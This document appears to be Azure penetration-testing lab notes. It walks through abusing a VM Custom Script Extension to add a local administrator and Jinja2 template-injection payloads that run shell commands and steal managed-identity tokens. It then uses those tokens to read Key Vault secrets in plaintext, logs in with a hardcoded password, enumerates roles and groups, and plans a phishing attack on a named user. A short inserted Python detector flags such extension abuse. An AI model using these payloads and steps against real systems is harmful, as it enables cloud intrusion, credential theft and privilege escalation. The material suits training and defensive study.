- Azure VMs User Data Abuse
- Azure VMs Custom Script Extension Abuse
Get-AzVMExtension -ResourceGroupName "Research" -VMName "infradminsrv"
Set-AzVMExtension -ResourceGroupName "Research" -ExtensionName "ExecCmd" -VMName "infradminsrv" -Location "Germany West Central" -Publisher Microsoft.Compute -ExtensionType CustomScriptExtension -TypeHandlerVersion 1.8 -SettingString '{"commandToExecute":"powershell net users studentx StudxPassword@123 /add /Y; net localgroup administrators student1 /add"}'
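A defender-side counterpart to the Custom Script Extension abuse above, added here as an example and not part of the original notes: it reviews Azure Activity Log extension-write records and flags CustomScriptExtension deployments whose visible commandToExecute creates local accounts or changes the local Administrators group. The record layout (the ARM request body kept as a JSON string in properties.requestbody), the placeholder subscription/caller values and all sample records are assumptions constructed for the example.

```python
import json
import re
EXT_WRITE = "MICROSOFT.COMPUTE/VIRTUALMACHINES/EXTENSIONS/WRITE"

# Command patterns a Custom Script Extension should rarely run on a managed VM.
SUSPICIOUS = {
    "local_user_add": re.compile(r"\bnet\s+users?\b.*?/add", re.I),
    "local_admin_group_change": re.compile(r"\bnet\s+localgroup\s+administrators\b", re.I),
    "encoded_powershell": re.compile(r"\s-e(nc|ncodedcommand)?\s+[A-Za-z0-9+/=]{20,}", re.I),
    "download_and_run": re.compile(r"DownloadString|Invoke-WebRequest|Invoke-Expression|\biex\b", re.I),
}
def _record(resource_id, caller, body):
    # Constructed Activity Log record; assumed layout keeps the ARM request
    # body as a JSON string in properties.requestbody.
    return {"operationName": EXT_WRITE, "resourceId": resource_id, "caller": caller,
            "properties": {"requestbody": json.dumps(body)}}

# Constructed samples: the first mirrors the Set-AzVMExtension call above,
# the second is a routine monitoring-agent install that should not alert.
SAMPLE_LOG = [
    _record("/subscriptions/SUB-ID-PLACEHOLDER/resourceGroups/Research/providers/"
            "Microsoft.Compute/virtualMachines/infradminsrv/extensions/ExecCmd",
            "CALLER-PLACEHOLDER",
            {"properties": {"publisher": "Microsoft.Compute", "type": "CustomScriptExtension",
                            "settings": {"commandToExecute": "powershell net users studentx StudxPassword@123 /add /Y; "
                                                             "net localgroup administrators student1 /add"}}}),
    _record("/subscriptions/SUB-ID-PLACEHOLDER/resourceGroups/Research/providers/"
            "Microsoft.Compute/virtualMachines/webfe01/extensions/AzureMonitorWindowsAgent",
            "deploy-pipeline",
            {"properties": {"publisher": "Microsoft.Azure.Monitor", "type": "AzureMonitorWindowsAgent"}}),
]

def review_extension_writes(records):
    """One finding per CustomScriptExtension write: 'high' when the visible
    commandToExecute matches a suspicious pattern, 'review' when no command is
    visible (protectedSettings are never logged), otherwise 'audit'."""
    findings = []
    for rec in records:
        if rec.get("operationName", "").upper() != EXT_WRITE:
            continue
        props = json.loads(rec["properties"].get("requestbody") or "{}").get("properties", {})
        if props.get("type", "").lower() != "customscriptextension":
            continue
        cmd = props.get("settings", {}).get("commandToExecute", "")
        hits = [name for name, rx in SUSPICIOUS.items() if rx.search(cmd)]
        severity = "high" if hits else ("review" if not cmd else "audit")
        vm = rec["resourceId"].split("/virtualMachines/")[1].split("/")[0]
        findings.append({"vm": vm, "caller": rec.get("caller"), "severity": severity, "indicators": hits})
    return findings
```

Because protectedSettings never reach the Activity Log, every CustomScriptExtension write with no visible command is still surfaced for review rather than silently dropped.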
- Abuse SSTI
- Use the obtained token with Az PowerShell to find all accessible resources
- To access the key vault, request a key vault access token,
- then request a new ARM access token via the app RCE, connect using Az PowerShell, and use both the ARM token and the key vault token
$token = 'eyJ0....'
$keyvaulttoken = 'eyJ0....'
Connect-AzAccount -AccessToken $token -AccountId 2e91a4fe-a0f2-46ee-8214-fa2ff6aa9abc -KeyVaultAccessToken $keyvaulttoken
- Check whether we can access the key vault and read any secrets
Get-AzKeyVault
Get-AzKeyVaultSecret -VaultName ResearchKeyVault
Get-AzKeyVaultSecret -VaultName ResearchKeyVault -Name Reader -AsPlainText
6. Let's see what Azure resources the user Kathy has access to. Note that Kathy's access to the Azure portal using a web browser is blocked by a Conditional Access policy:
$password = ConvertTo-SecureString 'Gaxu@6991TEST$#*!@#' -AsPlainText -Force
$creds = New-Object System.Management.Automation.PSCredential('[email protected]',$password)
Connect-AzAccount -Credential $creds
Get-AzResource
7. Let's enumerate role assignments on the VM 'jumpvm':
Get-AzRoleAssignment -Scope /subscriptions/b413826f-108d-4049-8c11-d52d5d388768/resourceGroups/RESEARCH/providers/Microsoft.Compute/virtualMachines/jumpvm
8. So there is a group 'VM Admins' that has the Virtual Machine Command Executor role on the jumpvm VM; check what that role allows:
Get-AzRoleDefinition -Name "Virtual Machine Command Executor"
9. Let's get some information about the VM admins group and its membership:
Get-AzADGroup -DisplayName 'VM Admins'
Get-AzADGroupMember -GroupDisplayName 'VM Admins' | select UserPrincipalName
- We will use the Graph API rather than Az PowerShell to get all the details. Note that [email protected] is added to an administrative unit 'Control Group'.
(Get-AzAccessToken -ResourceUrl https://graph.microsoft.com).Token
11. Let's get information and membership of this administrative unit using Azure AD module. We are using Kathy's credentials below:
Import-Module C:\AzAD\Tools\AzureAD\AzureAD.psd1
Connect-AzureAD -Credential $creds
Get-AzureADMSAdministrativeUnit -Id e1e26d93-163e-42a2-a46e-1b7d52626395
Get-AzureADMSAdministrativeUnitMember -Id e1e26d93-163e-42a2-a46e-1b7d52626395
12. The VM Admins group is a member of the administrative unit. Let's check for any roles scoped to this administrative unit:
Get-AzureADMSScopedMembership -Id e1e26d93-163e-42a2-a46e-1b7d52626395 | fl *
- Let's check the role using the RoleId we got above:
Get-AzureADDirectoryRole -ObjectId 5b3935ed-b52d-4080-8b05-3a1832194d3a
- Get some more details about the user Roy:
Get-AzureADUser -ObjectId 8c088359-66fb-4253-ad0d-a91b82fd548a | fl *
- Information collected from jumpvm about user Roy: execute a phishing attack against this user, who has an authentication administrative role.
- Whoami Command
{% for x in ().__class__.__mro__[1].__subclasses__() %}
{% if "Popen" in x.__name__ %}
{{x('whoami',shell=True,stdout=-1).communicate()}}
{% endif %}
{% endfor %}
- Variables command
{% for x in ().__class__.__mro__[1].__subclasses__() %}
{% if "Popen" in x.__name__ %}
{{x('curl "$IDENTITY_ENDPOINT?resource=https://management.azure.com&api-version=2017-09-01" -H secret:$IDENTITY_HEADER',shell=True,stdout=-1).communicate()}}
{% endif %}
{% endfor %}
- Request a keyvault access token
{% for x in ().__class__.__mro__[1].__subclasses__() %}
{% if "Popen" in x.__name__ %}
{{x('curl "$IDENTITY_ENDPOINT?resource=https://vault.azure.net&api-version=2017-09-01" -H secret:$IDENTITY_HEADER',shell=True,stdout=-1).communicate()}}
{% endif %}
{% endfor %}
- Request a new ARM access token
{% for x in ().__class__.__mro__[1].__subclasses__() %}
{% if "Popen" in x.__name__ %}
{{x('curl "$IDENTITY_ENDPOINT?resource=https://management.azure.com&api-version=2017-09-01" -H secret:$IDENTITY_HEADER',shell=True,stdout=-1).communicate()}}
{% endif %}
{% endfor %}
{{''.__class__.__mro__[1].__subclasses__()}}
$Token = 'eyJ0eX..'
$URI = 'https://graph.microsoft.com/v1.0/users/[email protected]/memberOf'
$RequestParams = @{
Method = 'GET'
Uri = $URI
Headers = @{
'Authorization' = "Bearer $Token"
}
}
(Invoke-RestMethod @RequestParams).value